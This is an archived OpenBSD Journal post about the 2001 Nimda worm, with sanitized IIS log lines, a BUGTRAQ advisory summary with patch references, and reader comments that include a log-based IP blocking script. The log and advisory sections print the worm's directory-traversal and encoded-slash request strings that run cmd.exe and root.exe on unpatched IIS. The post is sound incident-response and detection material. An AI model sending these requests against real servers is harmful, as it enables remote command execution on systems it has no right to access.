OpenBSD Journal

Nimda worm traffic signature

Contributed by Dengue on from the attempt-to-head-off-a-ton-of-questions-to-misc@ dept.

Another Windows worm is on the loose. It's named Nimda, and naturally it targets IIS on NT/2k. Why, you ask, do I care? Because I noticed during the whole 'Code Red' thing, that people kept sending log excerpts to misc@ asking if they were being attacked. Now, granted the *.exe in the URL is a dead giveaway, but I'll still bet you this shows up on misc@ . It spreads via multiple vectors, one of which is visiting an infected site using Internet Explorer. So think about that before you get curious and visit your *attacker* after they show up in your logs.

This is what the traffic looks like [*source address sanitized*]:

0.0.0.0 - - [19/Sep/2001:02:12:00 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 214 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:00 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 212 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 222 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 222 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 236 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP
/1.0" 403 253 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:01 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP
/1.0" 403 253 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:02 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 403 269 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:02 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 235 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:02 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:02 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 235 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 235 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 236 "-" "-"
0.0.0.0 - - [19/Sep/2001:02:12:03 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 236 "-" "-"
For the BUGTRAQ summary, read more.


Subject: Nimda Worm
   Date: Tue, 18 Sep 2001 18:49:43 -0600 (MDT)
   From: Dave Ahmad


     To:





Hey,

We have been receiving reports of a new worm from a large number of users.
Instead of deluging BUGTRAQ with traffic more appropriate for INCIDENTS,
we are posting a summary of the worm and the vulnerabilities it exploits:

A new worm named W32/Nimda-A (known aliases are Nimda,
Minda, Concept V, Code Rainbow) began to proliferate the morning of
September 18, 2001 on an extremely large scale that targets the Microsoft
Windows platform.  It attempts to spread via three mechanisms; as an email
attachment, a web defacement download, and through exploitation of known
IIS vulnerabilities.  Collateral damage include network performance
degradation due to high consumption of bandwidth during the propagation
process.  There have been reports of Apache Servers being inadvertantly
affected by Nimda by being subjected to a denial of service condition (the
configuration of these servers is not known).

This worm takes advantage of multiple vulnerabilities
and backdoors.  The worm spreads via e-mail and the web.  Through the
e-mail vector, the worm arrives in the users inbox as a message with a
variable subject line.  The e-mail contains an attachment named
'readme.exe'. This worm formats the e-mail in such a way as to take
advantage of a hole in older versions of Internet Explorer.  Outlook
mail clients use the Internet Explorer libraries to display HTML e-mail,
so by extension Outlook and Outlook Express are vulnerable as well, if
Internet Explorer is vulnerable.  The hole allows the readme.exe program
to execute automatically as soon as the e-mail is previewed or read.

Once it has infected a new victim, it mails copies of itself to other
potential victims, and begins scanning for vulnerable IIS Web servers.
When scanning for vulnerable IIS servers, it attempts to exploit the
Unicode hole (bid 1806) and the escaped characters decoding command
execution vulnerability (bid 2708).  It also attempts to access
the system via the root.exe backdoor left by Code Red II.  Once it
finds a vulnerable IIS server, it installs itself in such a way that
visitors to the now-infected web site will be sent a copy of a .eml
file, which is a copy of the e-mail that gets sent.  If the victim is
using Internet Explorer as their browser, and they are vulnerable to the
hole, they will execute the readme.exe attachment in the same way as if
they had viewed an infected e-mail message.

Attack Data:

Examination of the worm reveals the following attack strings
used to exploit IIS Web servers.

'/scripts/..%255c..'
'/_vti_bin/..%255c../..%255c../..%255c..'
'/_mem_bin/..%255c../..%255c../..%255c..'
'/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%'
'/scripts/..%c1%1c..'
'/scripts/..%c0%2f..'
'/scripts/..%c0%af..'
'/scripts/..%c1%9c..'
'/scripts/..%%35%63..'
'/scripts/..%%35c..'
'/scripts/..%25%35%63..'
'/scripts/..%252f..'

To those strings are added /winnt/system32/cmd.exe?/c+dir

Other attacks include:

'/scripts/root.exe?/c+dir'
'/MSADC/root.exe?/c+dir'

It is believed that all of the vulnerabilities exploited by this worm are
known.

The links below provide fix information.  Administrators and users are
advised to apply patches as soon as possible.  If further analysis
concludes that other vulnerabilities are involved, updated information
will be posted to the list.

See:

Bugtraq ID: 2524 / CVE ID: CAN-2001-0154
Microsoft Security Bulletin MS01-020
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp
VulDB: http://www.securityfocus.com/bid/2524

Bugtraq ID: 2708 / CVE ID:  CAN-2001-0333
Microsoft Security Bulletin MS01-026
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-026.asp
VulDB: http://www.securityfocus.com/bid/2708

Bugtraq ID: 1806 / CVE ID:  CVE-2000-0884
Microsoft Security Bulletin MS00-078
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-078.asp
http://www.securityfocus.com/bid/1806

Microsoft IIS Lockdown Tool:

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/locktool.asp

References:

Symantec W32.Nimda.A@mm
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

McAfee W32/Nimda@MM
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

Sophos W32/Nimda-A
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

For discussion of infection or attack attempts, subscribe to the INCIDENTS
mailing list.  For discussion of the worm itself and others, FORENSICS and
FOCUS-VIRUS are more appropriate than BUGTRAQ.

---

Dave Ahmad
Security Focus
www.securityfocus.com


I grabbed the readme.eml file that it uses as one of it's infection vectors and decoded the exploit.
@Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
Nice to see it's copyrighted 8-)

(Comments are closed)


Comments
  1. By earx () on

    300 lines in my log on a few hours...

  2. By Will Macdonald () wfm at macscan.co.uk on mailto:wfm at macscan.co.uk

    In the firewall at work I have a line saying:
    pass in quick on ep0 proto tcp from any to 123.123.123.123/32 port = 80 flags S keep state

    This has worked fine for the last couple of months, however this Nimda virus seems to have caused VERY erratic behaviour. I am assuming this is because I use the 'keep state' command, and the firewall is running out of resources with the thousand of requests it needs to keep track of??

    Would this erratic bahaviour been avoided if I had just removed the 'flags S keep state' command and let everything on port 80 through ??

    Will

  3. By Morten Liebach () morten@hotpost.dk on https://pc89225.stofanet.dk/

    There's this CERT advisory out now too.

    I've now set my personal apache up to run as SSL only, get's rid of a lot of the crap!

    Take care, have fun

    Morten

  4. By pravus () on

    i put this in cron to run every 5 minutes to block out hosts that have tried to exploit my machine. not the most elegant, but it works for me.



    #!/bin/sh

    HTTP_LOG="/path/to/access_log"
    RULE_IPF="/etc/ipf.rules"
    FILE_TMP="/tmp/$$.ipf"


    echo "# --- BLACKLIST --- #" > "$FILE_TMP"
    grep 'cmd.exe?|root.exe?' $HTTP_LOG |
    awk '{print $1}' |
    sort |
    uniq |
    while read ip; do
    echo "block in log quick on fxp1 from $ip/32 to any" >> "$FILE_TMP"
    done
    echo "# --- BLACKLIST --- #" >> "$FILE_TMP"
    echo >> "$FILE_TMP"

    cat "$RULE_IPF" >> "$FILE_TMP"

    ipf -A -Fa -f "$FILE_TMP"

    rm -f "$FILE_TMP"

Latest Articles

Credits

Copyright © - Daniel Hartmeier. All rights reserved. Articles and comments are copyright their respective authors, submission implies license to publish on this web site. Contents of the archive prior to as well as images and HTML templates were copied from the fabulous original deadly.org with Jose's and Jim's kind permission. This journal runs as CGI with httpd(8) on OpenBSD, the source code is BSD licensed. undeadly \Un*dead"ly\, a. Not subject to death; immortal. [Obs.]